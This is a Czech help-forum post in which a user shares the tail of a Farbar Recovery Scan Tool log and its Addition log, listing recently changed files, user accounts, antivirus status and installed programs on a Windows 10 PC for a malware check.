2021-01-09 15:47 - 2021-01-09 15:47 - 000000401 _____ C:\DelFix.txt
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-01-09 08:12 - 2021-01-09 08:12 - 000000000 ____D C:\Program Files (x86)\PrivaZer
2021-01-07 13:56 - 2021-01-07 13:56 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-07 09:04 - 2021-01-09 08:06 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-03 08:36 - 2021-01-16 10:12 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Exodus
2021-01-03 08:36 - 2021-01-16 10:02 - 000002280 _____ C:\Users\IRENA-PC\Desktop\Exodus.lnk
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Exodus Movement Inc
2021-01-03 08:36 - 2021-01-16 10:02 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\exodus
2020-12-26 19:07 - 2020-12-27 17:58 - 000000000 ___RD C:\Users\IRENA-PC\Dropbox
2020-12-26 18:55 - 2020-12-26 18:55 - 000669800 _____ (Dropbox, Inc.) C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe
2020-12-21 09:07 - 2021-01-09 15:16 - 000002869 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (1).lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 18:43 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2021-01-20 18:40 - 2020-08-19 19:06 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2021-01-20 18:22 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2021-01-20 18:17 - 2020-08-19 19:15 - 001693136 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2021-01-20 18:17 - 2019-12-07 15:43 - 000716742 _____ C:\WINDOWS\system32\perfh005.dat
2021-01-20 18:17 - 2019-12-07 15:43 - 000144920 _____ C:\WINDOWS\system32\perfc005.dat
2021-01-20 18:17 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2021-01-20 18:13 - 2020-08-19 19:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2021-01-20 18:13 - 2020-08-19 19:06 - 000008192 ___SH C:\DumpStack.log.tmp
2021-01-20 18:13 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-01-20 18:13 - 2018-12-26 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2021-01-20 18:04 - 2020-06-30 17:37 - 000002296 ____H C:\Users\IRENA-PC\Documents\Default.rdp
2021-01-20 13:09 - 2017-11-05 22:29 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Packages
2021-01-20 12:56 - 2020-09-06 10:11 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\PrivaZer
2021-01-20 11:10 - 2017-03-10 18:17 - 000044146 _____ C:\Users\IRENA-PC\Documents\klikačky.txt
2021-01-20 10:02 - 2017-01-30 08:45 - 000000000 ____D C:\Users\IRENA-PC\AppData\LocalLow\Mozilla
2021-01-20 09:46 - 2019-02-05 07:34 - 000000000 ____D C:\ProgramData\Mozilla
2021-01-20 08:48 - 2018-05-16 16:28 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\Kryptex
2021-01-20 08:17 - 2018-06-14 10:05 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0
2021-01-20 07:08 - 2020-08-19 19:19 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-01-20 07:08 - 2020-08-19 19:19 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-01-17 13:54 - 2017-07-05 17:16 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\vlc
2021-01-15 07:06 - 2019-12-07 10:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2021-01-14 04:09 - 2020-08-19 19:07 - 000000000 ____D C:\Users\IRENA-PC
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2021-01-13 22:05 - 2019-12-07 15:47 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\F12
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\SystemResetPlatform
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Sysprep
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\Com
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellExperiences
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\IME
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-01-13 22:05 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-01-13 21:55 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-01-13 21:43 - 2020-08-19 19:08 - 002877952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2021-01-13 21:32 - 2017-01-29 22:43 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-01-13 21:28 - 2017-01-29 22:43 - 135062968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-01-13 13:42 - 2019-04-16 19:31 - 000018134 _____ C:\Users\IRENA-PC\Documents\web hlavní stránka.txt
2021-01-11 20:14 - 2018-10-14 17:50 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\avidemux
2021-01-10 14:44 - 2019-03-19 10:59 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Ulozto
2021-01-09 18:46 - 2017-02-16 12:26 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome
2021-01-09 18:43 - 2017-12-16 15:22 - 000000000 ____D C:\Program Files (x86)\IQ Option
2021-01-09 15:16 - 2020-05-06 13:44 - 000002563 _____ C:\Users\IRENA-PC\Desktop\YouTube Music.lnk
2021-01-09 15:16 - 2020-03-26 15:41 - 000002689 _____ C:\Users\IRENA-PC\Desktop\SS TV Remote.lnk
2021-01-09 08:06 - 2017-01-30 08:44 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2021-01-08 13:28 - 2020-06-04 19:19 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2021-01-07 13:56 - 2017-01-30 08:44 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2021-01-07 07:09 - 2020-03-23 13:20 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2021-01-05 10:28 - 2020-07-25 06:20 - 000000000 ____D C:\Users\IRENA-PC\Downloads\Telegram Desktop
2021-01-05 10:17 - 2019-10-29 08:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Telegram Desktop
2021-01-03 17:07 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Authy Desktop
2021-01-03 10:57 - 2019-01-02 09:37 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\HandBrake
2021-01-03 08:36 - 2018-02-16 13:35 - 000000000 ____D C:\Users\IRENA-PC\AppData\Local\SquirrelTemp
2020-12-28 18:45 - 2019-07-07 19:03 - 000001086 _____ C:\Users\IRENA-PC\Documents\telenovely.txt
2020-12-23 20:11 - 2017-04-27 15:39 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Ulozto File Manager
2020-12-22 18:29 - 2020-08-19 19:19 - 000004562 _____ C:\WINDOWS\system32\Tasks\Adobe Acrobat Update Task
2020-12-22 18:28 - 2020-12-15 18:05 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000001382 _____ C:\Users\Public\Desktop\Free Netflix Download.lnk
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeGrabApp
2020-12-22 13:54 - 2019-10-12 11:58 - 000000000 ____D C:\Program Files (x86)\FreeGrabApp

==================== Files in the root of some directories ========

2019-01-25 08:47 - 2019-02-04 08:42 - 000012386 _____ () C:\Users\IRENA-PC\AppData\Roaming\downloads.json

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

Re: Prosím o kontrolu logu

Napsal: 20 led 2021 18:52
od chenny
Addition log

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-01-2021
Ran by IRENA-PC (20-01-2021 18:44:34)
Running from C:\Users\IRENA-PC\Desktop
Windows 10 Pro Version 2004 19041.746 (X64) (2020-08-19 18:19:30)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-3708313529-2431682257-2596704864-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3708313529-2431682257-2596704864-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-3708313529-2431682257-2596704864-1000 - Limited - Disabled)
Guest (S-1-5-21-3708313529-2431682257-2596704864-501 - Limited - Disabled)
IRENA-PC (S-1-5-21-3708313529-2431682257-2596704864-1001 - Administrator - Enabled) => C:\Users\IRENA-PC
WDAGUtilityAccount (S-1-5-21-3708313529-2431682257-2596704864-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

„Microsoft Office Proofing Tools 2016“ – lietuvių k. (HKLM\...\{90160000-001F-0427-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)
Adobe Photoshop CC 2019 (HKLM-x32\...\PHSP_20_0_4) (Version: 20.0.4 - Adobe Systems Incorporated)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
Alati za jezičnu provjeru u sustavu Microsoft Office 2016 - hrvatski (HKLM\...\{90160000-001F-041A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Authy Desktop (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\authy) (Version: 1.8.3 - Twilio Inc.)
Avidemux 2.7 - 64 bits (HKLM-x32\...\Avidemux 2.7 - 64 bits (64-bit)) (Version: 2.7.1.180604 - )
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{3598910c-c7d9-450b-bfde-5a8d49dabd30}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{8cbf4d89-2ce8-4178-8bb4-1600f5e69e65}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{b859fd90-1d56-4013-8e47-a727a65ae7a3}) (Version: 2.7.3 - Mean)
Avidemux VC++ 64bits (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{c28b1ebe-2fed-4e19-a347-e0629e5cf6f5}) (Version: 2.7.2 - Mean)
Bighits4U Viewer 3.6 (HKLM-x32\...\{ACC1EF6D-F9C2-4B5E-BA01-25F3F9E57B68}) (Version: 3.6.0 - BigHits4U) Hidden
Bighits4U Viewer 3.6 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Bighits4U Viewer 3.6 3.6.0) (Version: 3.6.0 - BigHits4U)
Công cụ Soát lỗi Microsoft Office 2016 - Tiếng Việt (HKLM\...\{90160000-001F-042A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Eines de correcció del Microsoft Office 2016: català (HKLM\...\{90160000-001F-0403-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Exodus (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\exodus) (Version: 21.1.15 - Exodus Movement Inc)
Ferramentas de Verificação do Microsoft Office 2016 - Português (HKLM\...\{90160000-001F-0816-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM\...\{90160000-001F-0456-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Free MP3 Cutter 1.01 (HKLM-x32\...\{847E0734-4457-4B48-BF49-998D1CF2CFA1}_is1) (Version: - PolySoft Solutions)
Free Netflix Download version 5.0.16.1204 (HKLM-x32\...\Free Netflix Download_is1) (Version: 5.0.16.1204 - FreeGrabApp Ltd)
GhostMouse (HKLM-x32\...\GhostMouse_is1) (Version: Free V3.2.3 - ghost-mouse.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden
Greenshot 1.2.9.129 (HKLM\...\Greenshot_is1) (Version: 1.2.9.129 - Greenshot)
HandBrake 1.2.2 (HKLM-x32\...\HandBrake) (Version: 1.2.2 - )
Herramientas de corrección de Microsoft Office 2016: español (HKLM\...\{90160000-001F-0C0A-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
I-Microsoft Office Proofing Tools 2016 - IsiZulu (HKLM\...\{90160000-001F-0435-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Innealan-dearbhaidh Microsoft Office 2016 - Gàidhlig (HKLM\...\{90160000-001F-0491-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Instrumente de verificare Microsoft Office 2016 - Română (HKLM\...\{90160000-001F-0418-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Java 8 Update 271 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180271F0}) (Version: 8.0.2710.9 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Korrekturredskaber til Microsoft Office 2016 - Dansk (HKLM\...\{90160000-001F-0406-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (bokmål) (HKLM\...\{90160000-001F-0414-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Korrekturverktøy for Microsoft Office 2016 – norsk (nynorsk) (HKLM\...\{90160000-001F-0814-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
MediaInfo 18.05 (HKLM\...\MediaInfo) (Version: 18.05 - MediaArea.net)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.71 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Office Proofing Tools Kit Compilation 2016 (HKLM\...\Office16.PROOFKIT) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)
Microsoft Project Professional 2016 (HKLM\...\Office16.PRJPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visio Professional 2016 (HKLM\...\Office16.VISPRO) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706 (HKLM-x32\...\{95ac1cfa-f4fb-4d1b-8912-7f9d5fbb140d}) (Version: 14.15.26706.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation)
Mozilla Firefox 84.0.2 (x64 cs) (HKLM\...\Mozilla Firefox 84.0.2 (x64 cs)) (Version: 84.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 55.0.1 - Mozilla)
Mp3tag v2.97 (HKLM-x32\...\Mp3tag) (Version: 2.97 - Florian Heidenreich)
Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (HKLM\...\{90160000-001F-0415-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Orodja za preverjanje za Microsoft Office 2016 – angleščina (HKLM\...\{90160000-001F-0424-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PrivaZer (HKLM-x32\...\PrivaZer) (Version: 4.0.17.0 - Goversoft LLC)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 4.3.1 r3321 - Rainmeter)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM\...\{90160000-001F-0416-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
RoboForex - MetaTrader 4 (HKLM-x32\...\RoboForex - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Strumenti di correzione di Microsoft Office 2016 - Italiano (HKLM\...\{90160000-001F-0410-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Subtitle Edit 3.5.18 (HKLM\...\SubtitleEdit_is1) (Version: 3.5.18.1 - Nikse)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1254 - SUPERAntiSpyware.com)
Taalprogramma's voor Microsoft Office 2016 - Nederlands (HKLM\...\{90160000-001F-0413-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.2.2756 - TeamViewer)
Telegram Desktop version 2.5.1 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 2.5.1 - Telegram FZ-LLC)
Total Commander 64+32-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.21a - Ghisler Software GmbH)
Tweetz Desktop verze 0.11.0 (HKLM-x32\...\{FE1B7E2D-6E96-4D39-B39F-62CA62D11A79}_is1) (Version: 0.11.0 - Mike Ward)
Uirlisí Profála Microsoft Office 2016 - Gaeilge (HKLM\...\{90160000-001F-083C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ulož.to FileManager 2.82 (64-bit) (HKLM\...\3f2e2cd28b0e4e4396c2402fbc85a0f0_is1) (Version: 2.82 - Uloz.to cloud a.s.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation)
Veglat e kontrollit gjuhësor të Microsoft Office 2016 - shqip (HKLM\...\{90160000-001F-041C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Web Launch Recorder (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\WebLaunchRecorder) (Version: 2.0 - )
Εργαλεία γλωσσικού ελέγχου του Microsoft Office 2016 - Ελληνικά (HKLM\...\{90160000-001F-0408-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Засоби перевірки правопису Microsoft Office 2016 – українська (HKLM\...\{90160000-001F-0422-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Средства проверки правописания Microsoft Office 2016 — русский (HKLM\...\{90160000-001F-0419-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
כלי ההגהה של Microsoft Office 2016 - עברית (HKLM\...\{90160000-001F-040D-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
ابزارهای تصحیح Microsoft Office 2016 - فارسی (HKLM\...\{90160000-001F-0429-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden

Packages:
=========
Deezer Music -> C:\Program Files\WindowsApps\Deezer.62021768415AF_4.32.0.0_x86__q7m17pa7q8kj0 [2021-01-19] (Deezer SA)
Easy WOL (Wake on LAN) -> C:\Program Files\WindowsApps\1460ArunasAdomaitis.EasyWOLWakeonLAN_1.1.1.0_x64__fzh5k4x0zh00p [2019-05-21] (Arunas Adomaitis)
Facebook -> C:\Program Files\WindowsApps\Facebook.Facebook_186.2619.19263.0_x86__8xx8rvfyw5nnt [2019-10-10] (Facebook Inc)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.1102.0_x64__8wekyb3d8bbwe [2021-01-13] (Microsoft Studios) [MS Ad]
Microsoft To Do -> C:\Program Files\WindowsApps\Microsoft.Todos_2.36.4182.0_x64__8wekyb3d8bbwe [2021-01-19] (Microsoft Corporation) [Startup Task]
Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.16.20102.0_x64__8wekyb3d8bbwe [2020-12-16] (Microsoft Studios)
Samsung Printer Experience -> C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCO.LTD.SamsungPrinterExperience_1.3.15.0_x64__3c1yjt4zspk6g [2017-02-03] (Samsung Electronics Co. Ltd.)
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
